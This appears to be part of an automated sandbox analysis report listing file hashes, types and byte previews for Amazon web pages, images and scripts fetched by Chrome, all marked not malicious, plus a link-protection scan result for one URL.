                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (7131)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):605872
                                                                                                                                                                                                                                                                Entropy (8bit):5.707622423556393
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:RPKQvdto183O20WRaloPmdTAfL3WU2O15kV3iF5LGgzMMJ8O7X7BwfB1fUvB+g9U:ZLvdto183O20WRaloPmdTAfL3WU1kizQ
                                                                                                                                                                                                                                                                MD5:C029572B057CAF9BBF00FB54C7C9A00A
                                                                                                                                                                                                                                                                SHA1:830B309CFE44B4D1383EC48CEEA3D8727AF93581
                                                                                                                                                                                                                                                                SHA-256:693001FE8A98537C2D6F099CBFBCFB7F2EA1B4A20D81A36E20FA67CFB81D9AA6
                                                                                                                                                                                                                                                                SHA-512:05CA7A2D7CCA9CD96B9EBEDDDA65088A3574E85F8D9568D044D081080791364CF1B862557C4D34F1572A3774DD9563A48CC6E815703007342CFE6344749979F1
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/
                                                                                                                                                                                                                                                                Preview:<!doctype html><html lang="en-ae" class="a-no-js" data-19ax5a9jf="dingo"> sp:feature:head-start -->.<head><script>var aPageStart = (new Date()).getTime();</script><meta charset="utf-8"/>. sp:end-feature:head-start -->. sp:feature:csm:head-open-part1 -->..<script type='text/javascript'>var ue_t0=ue_t0||+new Date();</script>. sp:end-feature:csm:head-open-part1 -->. sp:feature:cs-optimization -->.<meta http-equiv='x-dns-prefetch-control' content='on'>.<link rel="dns-prefetch" href="https://images-eu.ssl-images-amazon.com">.<link rel="dns-prefetch" href="https://m.media-amazon.com">.<link rel="dns-prefetch" href="https://completion.amazon.com">. sp:end-feature:cs-optimization -->. sp:feature:csm:head-open-part2 -->.<script type='text/javascript'>.window.ue_ihb = (window.ue_ihb || window.ueinit || 0) + 1;.if (window.ue_ihb === 1) {..var ue_csm = window,. ue_hob = +new Date();.(function(d){var e=d.ue=d.ue||{},f=Date.now||function(){return+new Date};e.d=function
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2421
                                                                                                                                                                                                                                                                Entropy (8bit):7.797042423967308
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rM/qcP+u/8Fhe4lBDHGYmiRovstmGRG01ef+6C9mk5ClkcORfiU:THtP+k8FhlpHvivstmGb1x6m4l4iU
                                                                                                                                                                                                                                                                MD5:6CAE79A2EAD1A5A00AF8D1AE56413842
                                                                                                                                                                                                                                                                SHA1:465BEFA59575CF43025294F2B43C7B84A76FFE7C
                                                                                                                                                                                                                                                                SHA-256:D1D6A6566B78C49B6849DC0E1ED1A6E8BE772ED9A0AF8736733963BDEDB61276
                                                                                                                                                                                                                                                                SHA-512:A756A0FC34888B62127783C4A6116539BDACEEB26C4607763ED8B583DC4845FB2020BC431327800C56CEA6A1863FC186C1DDD850B9BF64823E2F370684D9459D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!1AQ..2Raq...."BSr..$3...#%&bt..........................................!............?..............<..O ..x......'....X.1......i...U#..-4.%$Q.'.t.V.....I..Kp..%\5....d.....F....tD@DD.D@DD.D@_..Tm....-;.G...d07.P.ZGt..>\E...`..?Z.S.`..=....[].T....9..i..}.....S./.....M+....nq(..t........<.`..._@..#s...-.=...A../].lE.....ll.08..u..tW_Vh.n..47.C...fX;.....*...p.........j.k....mS.'.......:.K.n.v..$0......$v8...!.z.q.Z]J[Cq....h.Sb./s....D......W[.|F~..6..T..C.V.D?..*.:." .......+.....QQ.m..E..c...Q...Wc.UT..)%2..G).7.A..27.KX.:`..........bdPo|.d........T.F...H.2....L.c..s.q.Q.-.Z..3.'|...! .'...........<.k.l..H.N.{z.O.VZ.OUJ(Em#.mM8......>p.8=.8...\d.QQ.OT.>.0.5C.s....d.8......r^.]!..H.....[...../..l....30..w...g.........O...Y..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (595)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):52976
                                                                                                                                                                                                                                                                Entropy (8bit):5.315043781142496
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:/OwplOVh9aGPNItQPtazaikxMXXPB+YQycmcUOzheEfbTAYfnrIulbsksLZHU:Y9kXcmmzhe4vJrPsks6
                                                                                                                                                                                                                                                                MD5:08ADE75238D50BE6B835CB9EB47F77BE
                                                                                                                                                                                                                                                                SHA1:1283D0AD3A738552036F4AC495484DAB0E4F7C24
                                                                                                                                                                                                                                                                SHA-256:D6F8F9D8EEF0165B139120551326140D8693B6309A64E55FC40DE19BE21C614B
                                                                                                                                                                                                                                                                SHA-512:10790BEA14F378A0722FD5D6CF5683C45A3F5DE253CB1BC25126A96BE70D5D83E7BF9029CB974C7F8B8C10A4FA537A3A09B9A5DB97CD69E9A937EFF271F841D6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/51BqsgbDI7L.js?AUIClients/CardJsRuntimeBuzzCopyBuild
                                                                                                                                                                                                                                                                Preview:(function(V){var f=window.AmazonUIPageJS||window.P,M=f._namespace||f.attributeErrors,a=M?M("CardJsRuntimeBuzzCopyBuild",""):f;a.guardFatal?a.guardFatal(V)(a,window):a.execute(function(){V(a,window)})})(function(V,f,M){mix_d("@c/api-lock",["exports"],function(a){var c={},d=function(a){delete c[a.type]};a["default"]={isLockedFor:function(a){return!a.every(function(a){return!!c[a]})},unlockForEvent:function(a,b){c[a.type]=a;try{var e=b();if(e instanceof Promise)return e.finally?e.finally(function(){return d(a)}):.e.then(function(){return d(a)},function(b){d(a);throw b;});d(a)}catch(k){throw d(a),k;}return Promise.resolve()},unlockForEventOnce:function(a){c[a.type]=a},resetLocks:function(){Object.keys(c).forEach(function(a){return d(c[a])})}};a.initialize=function(a,b,c){};Object.defineProperty(a,"__esModule",{value:!0})});mix_d("@c/aui-untrusted-ajax",["exports","tslib","@p/a-ajax","@c/guard"],function(a,c,d,e){function b(a){return a&&"object"===typeof a&&"default"in a?a:{"default":a}}fun
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2163
                                                                                                                                                                                                                                                                Entropy (8bit):7.678609836585432
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r63aGXsbbbbbbbbbbbJku/ckKy2zd5En7Csuj1Z/tiKEejbqQwrEB4:TTXsbbbbbbbbbbbJkZkKbzjfBLvEejbS
                                                                                                                                                                                                                                                                MD5:1F26A83CA8A75E57A2C2E521D6DC770C
                                                                                                                                                                                                                                                                SHA1:ECA1486B82EBE5779C2DC127FE99BD274280A264
                                                                                                                                                                                                                                                                SHA-256:168F880DE6150966D924704B99257AF2A7A073BD5A940EA26C5152DDCD532628
                                                                                                                                                                                                                                                                SHA-512:6F467919536B5669D02BF712E421AB48D5F3753F4BAC84B7AAEAFCB1E0BE10A188989115565F8164C5586AB06386DFB5B0D2CE031F6DD83371266B113F6AC82C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763815_372x232_2X_en_AE._SY116_CB558609315_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..1a"2AQRq...#.34B....Cr.....................................................!ABQ............?..8..q......................................................................x.X....K.V#.F.......N.J..w....Z.+=L._..%..[Tf..../m.i...2....A1t...%weug.72..k\w...!...s..]om$......V}k.j.Z.'(.^..zh.....[-....?....Ev.+.*1!\..vb.`...=.eq..i:UznN&.U.y.!..+.28..l...bj.k.q.Y,m.j.6*.8Y...*1...W......A......*..K..6J.....>x6...{=......f..N..E...O.....d....L.r..P[.j^..V-..Rd3I..9I.}..?1.*>%..r...4r.....vPQi8.w..l@.2...=.....~{t.p....O.V..6...........d.<-7 .#.l.[..Q..|....C5...'.o... ..1+N.......8.%w.:#.y[.i.EAw?.m.\.k2^..................-.]..[.R.-obWo)..U.1.E....#wivVH"Z...H.p.2.....~.,....EV-. .EA'.+oq~?&fz.[..5-SF..9...}.|.c!Q..[b..8.J}kO......z.ud[I?.(.m7G..._3
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5488
                                                                                                                                                                                                                                                                Entropy (8bit):7.687534180044505
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TxjOCtETc7iWrKf+O3MK+VZGkJnPSPTbSZmpb+nA2cgMj5hA:VJSTc7ixGdKIGkJna7Gmpb+nBcgMg
                                                                                                                                                                                                                                                                MD5:5E8C5FC15D548B3D402592B37C34F415
                                                                                                                                                                                                                                                                SHA1:1AB227C832884E0901F843F03D6052242B98F3B7
                                                                                                                                                                                                                                                                SHA-256:2386B1162EEAC6F9E08D089F107D31A14F29F1E6AE8EFA33212B25388D9B56D6
                                                                                                                                                                                                                                                                SHA-512:38D4CE6EE4156E8923B224E6B7883F7396A7275BE7FFE2410167F5828FA94A6C3976A40203586499E32650FF9682973351F86C689EC1185CDFCFDA00257C5FDF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/51P+6IorDaL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........1..............................................................X........\..,ty.^.........c...........].g..Q..................p_.....Y..M.m..u.4.....\.1\.#.x.g.=..,...............y...i.:.t.j,.....n.l.5..7(!*..b...a]..;....K..............^K.^.1(.uL..g...aO0...r....8!...Zb......y..C..............c<`....M..3..'\..j.n{f.t[..W.+...B..`.v...../N..............c....^..2..Y..Uq....N.vEW.-..RB.+......N.+.................C..... .k....[/..v.lio.QUUu%.]QT'. ...;+..._.&@.............[.A. ..;k.[n..v.li5.}EWU..Uu%u..+g...>.|..tk..................L.K.38...-..i;k.4z.6.....*.....p2.....H.L...........|.........8.9FE..l..].....t.......J.d..L.f...........................a.).e..l.[U..lh.:}IM7UTSu%p.R.eQ....._..L..............o...yF..D.)FQe.Z..M..Uth.:mMUM...u%q.R.U..G#.{.S.h...........<...<......8..Z.]
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):10336
                                                                                                                                                                                                                                                                Entropy (8bit):7.848664680730424
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:KkxkREgVsNrvh9TQ9TBM8nZiWoHWSvLzeuSBiGWN:KOCSlvrTQ9T28ZQLz3SA7N
                                                                                                                                                                                                                                                                MD5:A3A0930DDA8271F571B88E239CB7CF1B
                                                                                                                                                                                                                                                                SHA1:115B01E385719E1DEFD2E470733B93F0BDBA4EA9
                                                                                                                                                                                                                                                                SHA-256:2D8783DBE7D514162567F529B1F916172F7DDE1CCC7A3C95C15A4C06503E92FC
                                                                                                                                                                                                                                                                SHA-512:C83EB5146F2A5A51B8EA98602A51E41354AAF92233429856BA68B5A172A65C25C7A61847E48C4A1D1F07CFC31F7250EDFC26367C5648638FEA09D4A33F2E70B3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6...................................................................X.......................................................................p'Z...j-G.. ..&.I......*......./?.A..=......>.@..?N..G{. w.....E..tX._..=.._....W|.........I....nW......f.u.}......,."Z....5.MlT..5....>.$....YI.\..[_.z.....[S.........6}L...3...:v).@...|...N...k.6.Ws.w....W.S..P....Z;1D..x.S..(..q|....G.c..6.W.....}3....j.o.7.~...h.^..........[i..7M.v..`2.b..y..>}...+.z8..-N..x.{...~J..B..&.W".8.D...&..R.O...<^v......s6..mwN..w....t.?z...G...............4..I<....Z2...*vi._....r..g..Q.......l~....*.a..z..0.4.J;..v.?.n..{.......J..]!...X...K...U...e.~.............'v.O=.%{F_0.eRz...D...<....2g.J.o.n..^..R..U..8...(.r4..Q4..N..~....~.x.....W....R.[.f.z._.:g.:..~k.............'v.O;V....?12.=S_.<...xg......zy....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):29858
                                                                                                                                                                                                                                                                Entropy (8bit):5.401128038464651
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Hd3+dHJ67FPpE3eFNxQoRvL4aX+wgvDv5IPg4empqsRU+/jfrY6bV6akWvBiq/YQ:HJOpGPpEuKoZLbP2grqaP3bPdKZ3C
                                                                                                                                                                                                                                                                MD5:5216240E88E853EBEC76E4C1C4CCF79B
                                                                                                                                                                                                                                                                SHA1:091D92AE7052D4E99134E15193A2371C1C62F9EF
                                                                                                                                                                                                                                                                SHA-256:98F9434FCAB8C73DA8E226CBA3A42BBEBFF051E8892C8B19BBF241666839537D
                                                                                                                                                                                                                                                                SHA-512:92D0A3866D81D2502CC43E41132E5792BCC86B4301FA2E605DF3CFD8F3340E65CD5382F1308A9ECA88599CB3E1A4689A9111CEB1ED0AC9E6827A22214160BDE2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/hz/rhf?currentPageType=i18n-preferences-web&currentSubPageType=subSelectPreferences&excludeAsin=&fieldKeywords=&k=&keywords=&search=&auditEnabled=&previewCampaigns=&forceWidgets=&searchAlias=&cardJSPresent=true
                                                                                                                                                                                                                                                                Preview:{"html":"\u003cdiv class\u003d\"rhf-border\"\u003e\u003cdiv id\u003d\"rhf-shoveler\"\u003e\u003c/div\u003e\u003cdiv class\u003d\"celwidget pd_rd_w-KDrzC content-id-amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_p-cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_r-D4JBV84GZRFH5X5MR117 pd_rd_wg-JXtNQ pd_rd_r-b1ddadc4-07cc-418b-ae87-685c3d3e219f c-f\" cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\" data-csa-op-log-render\u003d\"\" data-csa-c-content-id\u003d\"amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603\" data-csa-c-slot-id\u003d\"desktop-rvi-1\" data-csa-c-type\u003d\"widget\" data-csa-c-painter\u003d\"p13n-rvi-cards\"\u003e\u003cscript\u003eif(window.mix_csa){window.mix_csa(\u0027[cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\"]\u0027, \u0027#CardInstance2z1KMxvapm-Bn_xm95OglA\u0027)(\u0027mark\u0027, \u0027bb\u0027)}\u003c/script\u003e\n\u003cscript\u003eif(window.uet){window.uet(\u0027bb\u0027,\u0027p13n-rvi_desktop-rvi_0\u0027,{wb: 1})}\u003c/script\u003e\n\u003cstyle\u003e.p13n-sc-rvi
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 449 x 153, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):36621
                                                                                                                                                                                                                                                                Entropy (8bit):7.983316536326704
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:Cczx7gHj7LLZ8BsDLnyV5BF51PT/Zi1EGd9ZhJbJrV3dZh2Ph1OAallR:CczxED7fYKijF5h41FhJ73gzg9
                                                                                                                                                                                                                                                                MD5:C78CEFFDF6E5E1A7F25017EB451176CB
                                                                                                                                                                                                                                                                SHA1:A9F0FA9D4E21B61851475A1489441185F6F07AC9
                                                                                                                                                                                                                                                                SHA-256:9847E6EDC1FCD90A56FEA0D3491518B961DD11AA6B5680238714965679982558
                                                                                                                                                                                                                                                                SHA-512:CF4B958AB9107737495F58C65D1359377F5E1EA9FA1BBB0628C719E925DB65717317CF3608646657B46EA442023E3EAEB0A7B69BACCBA7AB4477979BADBD92A6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/31Ux53k4l4L._SY153_FMpng_.png
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.............W..... .IDATx^.w.\e.....)g.I..Bz!..]..kA.C..I......z.W...\.`.%@.I..+.\@.......B..i....{.)s..>.$!0..'.Y{.93....V.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i...C....l.2...J.1D..1.@.... ....ZDQT..._...].J...=........M..[..hE...I.....z..D.P..@P......=l.;7i.I.........0...11.I .....A. ..V...^.\._.,..t.[...%..^....E...0^3.c#P....A..R..{h.'/"...\}....;......E.5.0..a..........q..t]...HO{'A. ...gU@UD4a.......&omZ....yU..DD.1.xVs]4.^...z.<..db.$..!A....A.U.........e....6......6......2..j_`...H..N.+P..........<...E.z....4...@.H`....*.../.T.o.[....`..,...Q....g./..[.......H...8. .!@?..h%4..,N..%...c......M.p2.|._b.B....pl.?......P.%..J....VY.!..O...9o:%..h.8B.X....<ohU....I...h..^WR....U..D.x<.".F.M....P..$9...U..p."...E......N..&...'.3./....l{.*M...D.c.A.z....8.......P.;v(....'...QV..U6.].#:.A.75...$0......9.xO.g.J_.5R..a......i..am..>.D;.M.4Z.;.W..Bo.q.........E..,@..,...1.hi......}...+@K.a...a........
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):74985
                                                                                                                                                                                                                                                                Entropy (8bit):7.103595381590611
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:0T2KrYKXlzzBPO14IXApH/vx8Ltta1Ecpysx+Ax1R4g:01r/Xl/I54nx8Lj2EcIsxbIg
                                                                                                                                                                                                                                                                MD5:17CE59BA5D2A3EBCCEA027FBEF6870F2
                                                                                                                                                                                                                                                                SHA1:FBAB3C3818C6FF0362D22C43CAEC9EBF52E53D7D
                                                                                                                                                                                                                                                                SHA-256:DF86C4DB91C36689F4BFB3881BF2F0E39741E3CB73C343C81078348D348C5FE5
                                                                                                                                                                                                                                                                SHA-512:4B9D3D900005933426289F2D07804C5BC78AF6F8CAEEBF3020FF12DAA9524FFFCA49AA2735641B1BCC3928D84E8DD941DE91D7BC8FE4089FC3A7F2D6719BBCB7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..............Exif..II*...............4IJP........4?jumb....jumdc2pa.........8.q.c2pa...4.jumb...Gjumdc2ma.........8.q.urn:uuid:ed07aaef-753d-4a77-9e68-e0db0e6e2ca8.....jumb...)jumdc2as.........8.q.c2pa.assertions.....jumb...&jumdcbor.........8.q.c2pa.actions.....cbor.gactions..factionkc2pa.editedmsoftwareAgentmAdobe FireflyqdigitalSourceTypexShttp://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia....jumb...(jumdcbor.........8.q.c2pa.hash.data....|cbor.jexclusions..estart..flength.4Kdnamenjumbf manifestcalgfsha256dhashX .l*....Q7.o.K...l].c.F..>..l1o.cpadI.............jumb...$jumdc2cl.........8.q.c2pa.claim.....cbor.hdc:titleoGenerated imageidc:formatjimage/jpegjinstanceIDx(xmp.iid:7EE25733472B11EF8FE8FE57D3F77758oclaim_generatorx7Adobe_Photoshop/25.12.0 adobe_c2pa/0.9.3 c2pa-rs/0.31.0tclaim_generator_info..dnameoAdobe Photoshopgversiong25.12.0.isignaturex.self#jumbf=c2pa.signaturejassertions..curlx'self#jumbf=c2pa.assertions/c2pa.actionsdhashX J
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):10896
                                                                                                                                                                                                                                                                Entropy (8bit):6.053755322656456
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:fqXLqXQJ0IgDqutxnw2UQxmVeXud/uKDG5x/X9EE2XbzhkEmk/lqqRrYQf5d5P:faeXO07nn7mVIuJLG5hX9ZEdkgD5f5dR
                                                                                                                                                                                                                                                                MD5:980CD435277A7621B6118CBDB85D6309
                                                                                                                                                                                                                                                                SHA1:FE93136BC14F0E236032FB0065BC55B034AFEEE1
                                                                                                                                                                                                                                                                SHA-256:13973BAFA1151CD2034520D96ECC4E8F5A0E2E80E0282758BCD04F426A64DC8A
                                                                                                                                                                                                                                                                SHA-512:AE481508B42438ACCD205B774C630B14A1DF4ECF960CEF339A8F9C6924D97EA7586FE4C41E1CCC44EBCB3FEB087A545105840D268F35CFE9FF5EA3E3E909F181
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://url6.mailanyone.net/api/v1/dl/20240809e5bdf3f5179489f8719c99d6202624e2/result?u=05a3b840-58ae-11ef-a257-0242ac110030&d=4%7Cmail%2F90%2F1718735400%2F1sJdcn-00066a-5L%7Cin6o%7C57e1b682%7C9862810%7C9895322%7C6671D2A9D5E8CBE4BA7AD963BA80AE39&m=1sJdcn-00066a-5L&o=%2Fphtp%3A%2Fstsiaectponil%2Ften.&s=r8DnnBsR0-04oskybCA7E0lSzWQ
                                                                                                                                                                                                                                                                Preview:{"verdict":1,"original_url":"https://specialpoint.net/","landing_url":"https://specialpoint.net/","features":["Has borderless iframe"],"cus_prefs":{"branding_logo":"iVBORw0KGgoAAAANSUhEUgAAAVgAAABACAYAAABfnm8CAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAALiMAAC4jAXilP3YAABzHSURBVHhe7Z0HmBzFlce1S+YMIotgjEgiZxtjjMkcyZyOHE0QRzyCAIE4MBYgskmSQCST4e4wQcKIw8gEE4+cgwCBwYgMEkggIUsC//7db/abmZ2ZrqruSUv/vu9tVfXUexW6t7q6urqq47vvvvtFr169focsi3QgrcQ3yAvILR0dHWOR76OjAVDO+XD2RrbFzlI69v3333fi/Iv8RSiNd5DTOjs7n4yO5OTk5IRAw/MJDU3LQz4fR1aybDuDqm4i+yGfx5bcIP4EnNnMTE5OTo436sHNH3tbG3qd6mk/RaO3UXwkGeJ2IBehex2ysB12RT1b1U9OTk5OEGqArsPdLw62PuT3U5zVeXz/LD5SHXqhB9Kw/sGCXpDONaRxoAWDIQ/H42j4JYTp5P94ZKaFGwb5XhJnU2RlZCHE52ZzMXX3pvlrQj3Pi2yMdx1kCWR2Ha/AW9i8yPxVwVZv5GwLthJTkcnIR8h45CXK8wVuEJwfdYzOiUMtxXfIFERlex95jev39Xpcw5xntV9r4t0QWQ4pH+5rNh/rRC2FTCajbQP5vcYKUBXiLIpMNBUv0JuELGamUoGdQWY2CPS3MVMNgfQ2QO5BZlkWvEDvZjNVE+IthgxHnK494l1mqjUh3iam0tKQT/ES3lNxl7HsO4PeppGhNoDyfYXcgmxPMPV7HmzMhq0DkNeiBFoU8jeKm2jnB+T59DjrbcO+ZH5
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 276x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9200
                                                                                                                                                                                                                                                                Entropy (8bit):7.906522831566393
                                                                                                                                                                                                                                                                Encrypted:false
